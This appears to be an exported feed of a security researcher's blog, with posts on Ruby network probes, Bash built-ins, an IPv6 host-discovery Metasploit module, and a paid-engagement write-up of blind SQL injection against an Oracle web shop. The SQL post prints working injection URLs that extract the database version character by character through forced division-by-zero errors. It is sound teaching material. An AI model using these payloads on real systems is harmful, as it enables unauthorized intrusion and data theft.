tag:blogger.com,1999:blog-27767686089124100182024-02-06T19:58:52.388-08:00Daniele BellucciWir müssen wissen, wir werden wissen - David Hilbertbelchhttp://www.blogger.com/profile/14587239463222422360noreply@blogger.comBlogger7125tag:blogger.com,1999:blog-2776768608912410018.post-74254178589286283672010-11-21T03:19:00.000-08:002010-11-21T04:34:17.730-08:00Meet the neighbors<font class="Apple-style-span" size="small"><br /><span class="Apple-style-span" style="font-size:small;"><br />Several months have passed after my first proposal but now <a href="http://dbellucci.blogspot.com/2009/12/discovering-dual-stack-hosts-with-ipmap.html">ip_map</a> has become an official auxiliary module of <a href="http://www.metasploit.com/framework/">metasploit</a>. They probably didn't like proposed name and decided to rename it into <a href="https://www.metasploit.com/redmine/projects/framework/repository/revisions/10700/entry/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb">ipv6_neighbor</a>. I think it was a good decision because the *map names has been used too much in past years (E.g nmap ... and of course: sqlmap). <br /><br/><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiufykQErduj8l9mBgv-mniixlBOXw1EQMD5ZCjTuvT76rL_lp5_hHYhOTST2bxrH9HM_gF0bzPXG0tlAH1oUdybN4mRPqfw8_VOJ9o_Yp3Y_Tec5uqZALkghKRtZK0P5EVQ0R7lJVyFIQ/s1600/Screen+shot+2010-11-21+at+11.36.34+AM.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 189px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiufykQErduj8l9mBgv-mniixlBOXw1EQMD5ZCjTuvT76rL_lp5_hHYhOTST2bxrH9HM_gF0bzPXG0tlAH1oUdybN4mRPqfw8_VOJ9o_Yp3Y_Tec5uqZALkghKRtZK0P5EVQ0R7lJVyFIQ/s320/Screen+shot+2010-11-21+at+11.36.34+AM.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5541965824654130610" /></a><br /><br /><br />Thanks to <a href="http://www.offensive-security.com/">offensive-security</a> for quickly adding an <a href="http://www.offensive-security.com/metasploit-unleashed/Discovery_IPV6_Neighbor">ipv6 discovery section</a> in their<a href="http://www.offensive-security.com/metasploit-unleashed/">Metasploit Unleashed</a>. If you want to know more about ipv6 insecurities I strongly suggest the excellent <a href="http://hakin9.org/system/articles/attachment1s/12635/original/Email_security_Hakin9_09_2010.pdf?1285836842">paper</a> from <a href="http://www.securityindepth.org/">Antonio Merola</a>.<br /></span><br /></font>belchhttp://www.blogger.com/profile/14587239463222422360noreply@blogger.com0tag:blogger.com,1999:blog-2776768608912410018.post-55052511799621618922010-02-25T05:33:00.000-08:002010-02-25T06:42:47.889-08:00Pulse: Data Visualization with gruff<font class="Apple-style-span" size="small"><br /><span class="Apple-style-span" style="font-size:small;"><br />I spent yesterday night looking for a way to display the data collected by Pulse. After hard googling the web i found a beautifull gem called <a href="http://nubyonrails.com/pages/gruff">gruff</a>. Plotting data with gruff is simply amazing and results in great quality graphs as you can see:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEzjQOJDHC7JtP862DnNZ7-9VDoywGAVTM24R4hTEqHS-ZgL1FnQ6a_dML7kiAOHLOIZDOrfQxLkJdxIYpFOXHjZlBKi70dGmvDVZlzA3kvDBieGzcI_DlYkw_Mdf29i2zCnGavtnJSO4/s1600-h/google.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 300px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEzjQOJDHC7JtP862DnNZ7-9VDoywGAVTM24R4hTEqHS-ZgL1FnQ6a_dML7kiAOHLOIZDOrfQxLkJdxIYpFOXHjZlBKi70dGmvDVZlzA3kvDBieGzcI_DlYkw_Mdf29i2zCnGavtnJSO4/s400/google.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5442175090431484242" /></a><br /><br />You can find my <a href="http://github.com/dbellucci/pulse/blob/master/examples/plot">plot</a> script inside <a href="http://github.com/dbellucci/pulse">Pulse@github</a>. Have a look!<br /></span><br /></font>belchhttp://www.blogger.com/profile/14587239463222422360noreply@blogger.com0tag:blogger.com,1999:blog-2776768608912410018.post-16975362318037723102010-02-22T14:01:00.000-08:002010-02-25T06:43:43.614-08:00Pulse!<font class="Apple-style-span" size="small"><span class="Apple-style-span" style="font-size:small;"><br />Pulse is a small framework for quickly building network probes and collect response time. Pulse is not intended to monitor complex networks or to replace most advanced tools such as Cacti. It's just a use to monitor response time variances on small amount of time. Right now there are two available probes: ICMP and HTTP but more are coming soon and little effort is required to build new ones from scratch. Let'see some examples.<br /> <br /><br /><font class="Apple-style-span" face="Verdana" size="small" style=" font-weight: bold; ">ICMP Probe:</font><br /><br /><pre name="code" class="ruby"><br />require 'pulse'<br />include Pulse<br /><br />ICMP.pulse(:target => '192.168.1.1', :count =>5, :round_trip => 5) do |probe| <br /> probe.on_fail do |echo|<br /> Pulse::STDERR.report echo<br /> end<br /><br /> probe.on_pulse do |echo|<br /> Pulse::STDOUT.report echo<br /> end<br />end<br /></pre><br /><br /><br /><font class="Apple-style-span" face="Verdana" size="small" style=" font-weight: bold; ">HTTP Probe:</font><br /><br /><pre name="code" class="ruby"><br />require 'pulse'<br />include Pulse<br /><br />HTTP.pulse(:target => 'http://localhost/', :count =>5, :round_trip => 5) do |probe|<br /> probe.on_fail do |echo|<br /> Pulse::STDERR.report echo<br /> end<br /><br /> probe.on_pulse do |echo|<br /> Pulse::STDOUT.report echo<br /> end<br /> end<br />end<br /></pre><br /><br />A real HTTP Prober should take care of HTTP Response as well. Let'say we want to say alive! if and only if strings 'works' is contained on HTTP response (body) message:<br /><br /><pre name="code" class="ruby"><br />require 'pulse'<br />include Pulse<br /><br />HTTP.pulse(:target => 'http://localhost/', :count =>5, :round_trip => 5) do |probe|<br /> probe.grep 'works'<br /><br /> probe.on_fail do |echo|<br /> Pulse::STDERR.report echo<br /> end<br /><br /> probe.on_pulse do |echo|<br /> Pulse::STDOUT.report echo<br /> end<br />end<br /></pre><br /><br />To collect round-trip time values pulse provides a SQLite3 Mixin module called Pulse::DB:<br /><br /><pre name="code" class="ruby"><br />require 'pulse'<br />include Pulse<br /><br />Pulse::DB::open('HTTP_pulse.sqlite')<br />HTTP.pulse(:target => 'http://localhost/', :count =>5, :round_trip => 5) do |probe|<br /> probe.on_fail do |echo|<br /> Pulse::STDERR.report echo<br /> end<br /><br /> probe.on_pulse do |echo|<br /> [Pulse::STDOUT, Pulse::DB].each do |r|<br /> r.report echo<br /> end<br /> end<br />end<br /></pre><br /><br />The consistency of the Database is guaranteed by an at_exit{ } charged to close DB which in turn will gracefully handle script termination.<br /><br /><a href="http://github.com/dbellucci/pulse">Pulse @ github</a></span><br /></font>belchhttp://www.blogger.com/profile/14587239463222422360noreply@blogger.com4tag:blogger.com,1999:blog-2776768608912410018.post-22533962023355394692010-02-02T02:42:00.001-08:002010-02-25T06:43:54.681-08:00Thinking Functionally In Ruby<span class="Apple-style-span" style="font-size:small;"><br />What functional programming is ?<br />Why it's a "pretty neat idea" ?<br />How to adopt functional programming principles in Ruby ?<div style="width:425px;text-align:left" id="__ss_2241201"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/RossC0/thinking-functionally-in-ruby" title="Thinking Functionally In Ruby">Thinking Functionally In Ruby</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=thinking-functionally-in-ruby-091016082812-phpapp02&stripped_title=thinking-functionally-in-ruby" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=thinking-functionally-in-ruby-091016082812-phpapp02&stripped_title=thinking-functionally-in-ruby" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/RossC0">Ross Lawley</a>.</div></div></span>belchhttp://www.blogger.com/profile/14587239463222422360noreply@blogger.com2tag:blogger.com,1999:blog-2776768608912410018.post-25502573407007599652010-01-26T15:31:00.000-08:002010-02-25T06:44:02.689-08:00Four Bash built-ins<font class="Apple-style-span" size="small"><span class="Apple-style-span" style="font-size:small;"><br />About a week ago i decided to read again the mighty <a href="http://tldp.org/LDP/abs/html/">Advanced Bash Scripting Guide</a>. Here follows some notes about four of its (funny) built-ins.<br /><br /><br /><font class="Apple-style-span" face="Verdana" size="small" style=" font-weight: bold; ">Truncate a file</font><br />belch@graal:~$ > file<br /><br />How does it works?<br /><br />belch@graal:~$ strace -efile -f bash -c '> file'<br /><br />.....<br /><br />open("file", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 3<br /><br /><br /><font class="Apple-style-span" face="Verdana" size="small" style=" font-weight: bold; ">Comma separator</font><br />belch@graal:~$ t1=0<br />belch@graal:~$ let t1="t1++, t1+2"<br />belch@graal:~$ echo $t1<br />3<br /><br />Comma separator links together arithmetic expression but only last is returned. On previous example it start by incrementing t1 then sum 2. As you can guess result is 3.<br /><br /><br /><font class="Apple-style-span" face="Verdana" size="small" style=" font-weight: bold; ">Nop</font><br />Believe it or not Bash has a 0x90 builtin. It's the placeholder :<br /><br />belch@graal:~$ :<br />belch@graal:~$ echo $?<br />0<br /><br /><br /><font class="Apple-style-span" face="Verdana" size="small" style=" font-weight: bold; ">Stacking dirs</font><br />belch@graal:~$ cd /home/belch<br />belch@graal:~$ echo ~+<br />/home/belch<br />belch@graal:~$ cd /tmp<br />belch@graal:~$ cd ~- # ~- get expanded in previous working directory<br />belch@graal:~$ pwd<br />/home/belch<br /></span><br /></font>belchhttp://www.blogger.com/profile/14587239463222422360noreply@blogger.com0tag:blogger.com,1999:blog-2776768608912410018.post-20234720316198419352009-12-23T15:53:00.000-08:002010-10-09T06:19:02.854-07:00Discovering Dual Stack Hosts with IP_MAP<span class="Apple-style-span" style="font-size:small;">IPv4 and IPv6 stacks can interoperate in order to make the v4 to v6 migration pretty smooth. Hence IPv4 hosts could run dual IP stack. Most firewalls with IPv6 support have separate rule-sets for IPv6 and IPv4.<br /><br />Modern operating systems such as Linux have their IPv6 stack enabled by default and many system administrators are unaware of issues that may arise from employing both stacks. Common mistakes involve missing coordination between rule sets and access policies of different stacks. Linux provides builtin packet filtering capabilities in kernel spaces but unfortunately IPv4 ruleset defined with iptables are not coordinated on IPv6 stack without manually specifying IPv6 rules with iptables6. The same could be applied on ISO/OSI upper layers where access policies have been implemented on application side.<br /><br /><br /><span class="Apple-style-span" style=" font-weight: bold; font-family:Verdana;font-size:small;">IPv6 Link-Local Address</span><br /><br />IPv6 hosts automatically assign to each of their interfaces a unique address<br />based on the L2 address when no external source of network addressing information is available. These addresses refer only to a particular broadcast domain. Router will not forward datagrams using link-local addresses at all.<br /><br />Link-local addresses have the prefix of FE80::/64. The last 64 bits of the IPv6 address is derived from the L2 address of related network adapter in such a way:<br /><ul><li>0xFF and 0xFE are inserted between the third and fourt byte of mac-address</li><li>second low order bit of the first byte of MAC Address gets complemented</li></ul>L2 Address 00:22:15:eb:19:4f gets IPv6 Link-local address fe80::222:15ff:feeb:194f<br /><br /><br /><span class="Apple-style-span" style=" font-weight: bold; font-family:Verdana;font-size:small;">Neighbor Discovery Protocol</span><br /><br /><span style="font-style:italic;">" IPv6 nodes on the same link use Neighbor Discovery to discover each other's presence, to determine each other's link-layer addresses, to find routers and to maintain reachability information about the paths to active neighbors. " <b><span class="Apple-style-span" style="font-style: normal;">RFC 2461</span></b></span><br /><br />To determine the link-layer address of a neighbor an ICMPv6 Neighbor Solicitation is sent by a node. Solicited node answer with a ICMPv6 Neighbor Advertisement to announce it's link-layer address. As you guess ICMPv6 Neighbor Discover Protocol has replaced ARP in IPv4.<br /><br />They replaced ARP to safely ensure Link Layer address translation. IPv6 header includes the AH header to authenticate the datagram. To this aim ICMPv6 gets encapsulated in IPv6 and AH extension neighbor spoofing should be avoided. It sounds like a novel in a perfect world to me but they still did it!<br /><br /><br /><span class="Apple-style-span" style=" font-weight: bold; font-family:Verdana;font-size:small;">Solicited Node Address</span><br /><br />In IPv4, the ARP Request frame is sent to the MAC-level broadcast, disturbing all nodes on the broadcast domain. For IPv6, instead of disturbing all IPv6 nodes on the local link , the solicited-node multicast address is used as the host destination for ICMPv6 Neighbor Solicitation message.<br /><br />The solicited-node multicast address consists of the prefix FF02::1:FF00:0/104 and the last 24-bits of the IPv6 address that is being resolved. Node with link-local IPv6 address FE80::20B:6AFF:FE47:194F is listening for multicast traffic at the solicited-node address FF02::1:FF47:194F. Something similar happens at L2 where a multicast prefixed ethernet datagram with 33:33 is sent.<br /><br /><br /><span class="Apple-style-span" style=" font-weight: bold; font-family:Verdana;font-size:small;">What is ip_map?</span><br /><br />ip_map is an auxiliary module for Metasploit to be used for enumerating dual stack hosts. It means that it follows a two step process:<br /><br /><br /><span class="Apple-style-span" style="font-weight: bold; "><span class="Apple-style-span" style="font-size:small;">ARP sweep</span></span><br />For each target hosts refered by its IPv4 address it sends an arp-request claiming for the L2 Address. If host responds with arp-reply it's L2, L3 address get added to the array <i>nodes</i><br /><br /><br /><span class="Apple-style-span" style="font-weight: bold; "><span class="Apple-style-span" style="font-size:small;">ICMPv6 ND sweep</span></span><br />For each elements of array <i>nodes</i> the L2 address component is extracted and used to get:<br /><ul><li>Solicited-Node multicast L2 address</li><li>Solicited-Node multicast L3 address</li><li>Node Link-local address</li></ul><br />An ICMPv6 ND Solicitation packet is built and injected into the wire awaiting for corresponding ICMPv6 Neighbor Advertisement (if any).<br /><br /><br /><span class="Apple-style-span" style=" font-weight: bold; font-family:Verdana;font-size:small;">How to ip_map?</span><br /><br /><b><span class="Apple-style-span" style="font-size:small;">Download msf trunk</span></b><span class="Apple-style-span" style="font-size:small;"><br />svn co http://www.metasploit.com/svn/framework3/trunk /framework<br /><br /></span><b><span class="Apple-style-span" style="font-size:small;">Download and install pcaprub from rubyforge</span></b><span class="Apple-style-span" style="font-size:small;"><br />svn co http://pcaprub.rubyforge.org/svn pcaprub<br />cd pcabrub<br />ruby extconf.rb && make && sudo make install<br /><br /></span><b><span class="Apple-style-span" style="font-size:small;">Download and install racket ( 1.0.7 at the moment of writing)</span></b><span class="Apple-style-span" style="font-size:small;"><br />sudo gem install --source http://spoofed.org/files/racket racket<br /><br /></span><b><span class="Apple-style-span" style="font-size:small;">Create resource file for msf: ndpsweep.msf:</span></b></span><div><span class="Apple-style-span" style="font-size:small;">use auxiliary/scanner/discovery/ip_map<br />setg INTERFACE eth0<br />setg SHOST 192.168.2.100<br />setg SMAC 00:21:5d:61:7f:c0<br />setg RHOSTS 192.168.2.0/24<br />run<br />exit<br /><br /></span><b><span class="Apple-style-span" style="font-size:small;">Download and install ip_map</span></b><span class="Apple-style-span" style="font-size:small;"><br />svn co http://msf-hack.googlecode.com/svn/trunk</span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-size:small;">cp ip_map.rb /framework/modules/auxiliary/scanner/discovery/<br /><br /></span> <b><span class="Apple-style-span" style="font-size:small;">Start msf framework</span></b><span class="Apple-style-span" style="font-size:small;"><br />sudo MSF_LOCAL_LIB=/var/lib/gems/1.8/gems/racket-1.0.7 ./msfconsole -r ./ndsweep.msf</span><br /><br /><span class="Apple-style-span" style="font-family:Verdana;"><b><br /></b></span></span></div><span class="Apple-style-span" style="font-family: Verdana; "><b>Watch module in action</b></span><div><span class="Apple-style-span" style="font-family: Verdana; "><b></b></span><span class="Apple-style-span" style="font-family: Verdana; font-size: 13px; "><a href="http://www.youtube.com/watch?v=rfYfpVv7KXc">http://www.youtube.com/watch?v=rfYfpVv7KXc</a><br /><br /><b><br /><a hre="http://hakin9.org/magazine/1528-email-security">Hakin9 Paper</a></b> by <a href="http://www.securityindepth.org/">Antonio Merola</a></span><br /><br /><div><br /></div></div>belchhttp://www.blogger.com/profile/14587239463222422360noreply@blogger.com7tag:blogger.com,1999:blog-2776768608912410018.post-86461281964886534292009-12-13T03:54:00.001-08:002010-02-24T08:11:06.509-08:00Blind SQL Injection: Inference through Underflow Error<span class="Apple-style-span" style="font-size:small;">About one year ago I was hired to perform a WAPT against a webportal. There was an eShop portlet composed by many servlets, one of which was used to obtain some discount by supplying a valid promotion code. Such a servlet returned a response page containing two different messages when a not valid promotion code had been inserted:<br /><ul><br /><li>Not a valid promotion code</li><br /><li>Error occurred please try later</li><br /></ul><br />The second message was returned when the supplied code contained some evil chars, such as a single quote, that probably raised an error on the Backend DBMS. Unfortunately there was a proper Error Handling policy catching the exception and avoiding code backtrace on the response page. It looked like the servlet was vulnerable to Blind SQL Injection. <br /><br />Recalling my contributions to the <a href="http://www.owasp.org/index.php/Category:OWASP_Backend_Security_Project" target="_blank">OWASP Backend Security Project,</a> i used some techniques I had previously developed to <a href="http://www.owasp.org/index.php/OWASP_Backend_Security_Project_DBMS_Fingerprint" >fingerprint a DBMS</a> by injecting some evil statements containing <a href="http://www.owasp.org/index.php/OWASP_Backend_Security_Project_DBMS_Fingerprint#Fingerprinting_with_string_concatenation" >string concatenation</a> and <a href="http://www.owasp.org/index.php/OWASP_Backend_Security_Project_DBMS_Fingerprint#Fingerprinting_through_SQL_Dialect_Injection">SQL dialect</a>.<br /><br />After a deep fuzzing and body response analisys I found that <i>Not a valid promotion code</i> was triggered by the following URLs:<br /><br />/codeValidator.jsp?code=wrong<br />/codeValidator.jsp?code=wr' || 'ong<br />/codeValidator.jsp?code=wr' || (SELECT 'o' FROM DUAL) || 'ng<br />/codeValidator.jsp?code=wr' || (SELECT SUBSTR('oo', 1, 1) FROM DUAL) || 'ng<br /><br /><br /><i>Error occurred please try later</i> was triggered by the following URLs:<br /><br />/codeValidator.jsp?code=wrong'<br />/codeValidator.jsp?code=wr'ng<br />/codeValidator.jsp?code=wr' || (SELECT 1/0 FROM DUAL) || 'ng<br /><br />They both confirmed a SQL Injection vulnerability and gave away Oracle as the backend DBMS. Unfortunately, I didn't have a valid promotion code, so what kind of tautology was I supposed to use?<br /><br />The answer I found was:<br /><ul><br /><li>Raise an underflow exception if and only if the tautology is FALSE</li><br /><li>Analyze what message is returned to guess if underflow exception occours</li><br /></ul><br /><br />To this end I set up an inference procedure using the PL/SQL function <a href="http://en.wikibooks.org/wiki/Oracle_Programming/SQL_Cheatsheet#Instr" >INSTR</a>. INSTR returns the index of the first occourrence of a char in a string, if the string contains such a char or 0. It means that INSTR follow this behaviour when used in conjuction of SUBSTR and 1/0 expression:<br /><br /><pre name="code" class="sql"><br />SELECT 1/INSTR(SUBSTR('daniele',1,1), 'd') FROM DUAL => 1<br />SELECT 1/INSTR(SUBSTR('daniele',1,1), 'z') FROM DUAL => Underflow Exception <br /></pre><br /><br />It was easy to deduce inference procedure. These query strings returned <i>Not a valid promotion code</i>:<br /><br /><pre name="code" class="sql"><br />?code=test' || (SELECT 1/INSTR(SUBSTR(version,1,1),'9') FROM v$instance) || '<br />?code=test' || (SELECT 1/INSTR(SUBSTR(version,2,1),'.') FROM v$instance) || '<br />?code=test' || (SELECT 1/INSTR(SUBSTR(version,3,1),'2') FROM v$instance) || '<br />?code=test' || (SELECT 1/INSTR(SUBSTR(version,4,1),'.') FROM v$instance) || '<br />?code=test' || (SELECT 1/INSTR(SUBSTR(version,5,1),'0') FROM v$instance) || '<br />?code=test' || (SELECT 1/INSTR(SUBSTR(version,6,1),'.') FROM v$instance) || '<br />?code=test' || (SELECT 1/INSTR(SUBSTR(version,7,1),'8') FROM v$instance) || '<br />?code=test' || (SELECT 1/INSTR(SUBSTR(version,8,1),'.') FROM v$instance) || '<br />?code=test' || (SELECT 1/INSTR(SUBSTR(version,9,1),'0') FROM v$instance) || '<br /></pre><br /><br />While these query strings returned <i>Error occurred please try later</i><br /><pre name="code" class="sql"><br />?code=wrong' || (SELECT 1/INSTR(SUBSTR(version,1,1),'8') FROM v$instance) || '<br />?code=wrong' || (SELECT 1/INSTR(SUBSTR(version,2,1),',') FROM v$instance) || '<br />?code=wrong' || (SELECT 1/INSTR(SUBSTR(version,3,1),'3') FROM v$instance) || '<br /></pre><br /></span>belchhttp://www.blogger.com/profile/14587239463222422360noreply@blogger.com1